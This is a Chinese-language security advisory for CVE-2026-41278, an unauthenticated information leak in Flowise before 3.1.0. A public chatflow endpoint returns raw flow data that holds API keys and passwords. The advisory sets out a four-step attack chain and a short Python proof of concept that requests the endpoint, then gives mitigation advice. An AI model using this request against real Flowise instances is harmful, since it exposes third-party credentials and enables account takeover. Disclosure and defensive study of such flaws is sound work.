CVE-2026-41278 CVSS 7.5 高危

CVE-2026-41278 Flowise敏感信息泄露漏洞

披露日期: 2026-04-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41278

漏洞类型

信息泄露

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Flowise

漏洞概述

Flowise是一款用于构建定制化大语言模型流程的拖拽式界面工具。在3.1.0版本之前，其`/api/v1/public-chatflows/:id`接口存在安全缺陷，未对返回的聊天流数据进行清理。攻击者可利用该漏洞无需认证即可获取包含凭证ID、明文API密钥及密码等敏感信息的完整流数据，造成严重信息泄露。该漏洞已在3.1.0版本中修复。

技术细节

该漏洞源于服务端对公共端点返回数据的处理逻辑缺失。在受影响版本中，`GET /api/v1/public-chatflows/:id`及`public-chatbotConfig`接口直接返回原始的JSON对象，而非经过过滤的安全视图。由于缺失`sanitizeFlowDataForPublicEndpoint`函数或该函数未生效，系统未能剥离敏感字段（如`credentials`、`apiKey`等）。攻击者仅需通过枚举或访问公开的聊天流ID，即可构造HTTP GET请求，获取后台配置的第三方服务凭证，进而接管关联账户或进行横向渗透。

攻击链分析

STEP 1

信息收集

攻击者识别目标Flowise实例，并寻找或猜测公开的chatflow ID。

STEP 2

漏洞利用

向`/api/v1/public-chatflows/{id}`发送未授权的GET请求。

STEP 3

数据窃取

接收服务器返回的未经过滤的JSON数据，其中包含API密钥、密码和凭证ID。

STEP 4

后续利用

利用窃取的凭证访问第三方服务（如OpenAI）进行进一步攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL configuration
target_base = "http://localhost:3000"
chatflow_id = "susceptible-chatflow-id"

# The vulnerable endpoint
url = f"{target_base}/api/v1/public-chatflows/{chatflow_id}"

try:
    # Send unauthenticated GET request
    response = requests.get(url, timeout=10)

    if response.status_code == 200:
        print("[+] Success! Response received:")
        print(response.text)
        
        # Parse JSON to check for sensitive data exposure
        data = response.json()
        # Logic to verify presence of credentials/keys would go here
    else:
        print(f"[-] Request failed with status code: {response.status_code}")

except Exception as e:
    print(f"[!] An error occurred: {e}")

影响范围

Flowise < 3.1.0

防御指南

临时缓解措施

如果无法立即升级，建议通过防火墙或反向代理限制对`/api/v1/`路径的外部访问，并在WAF层添加规则拦截对该特定端点的未授权请求。同时，应立即审查日志以确认是否有数据已被窃取。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表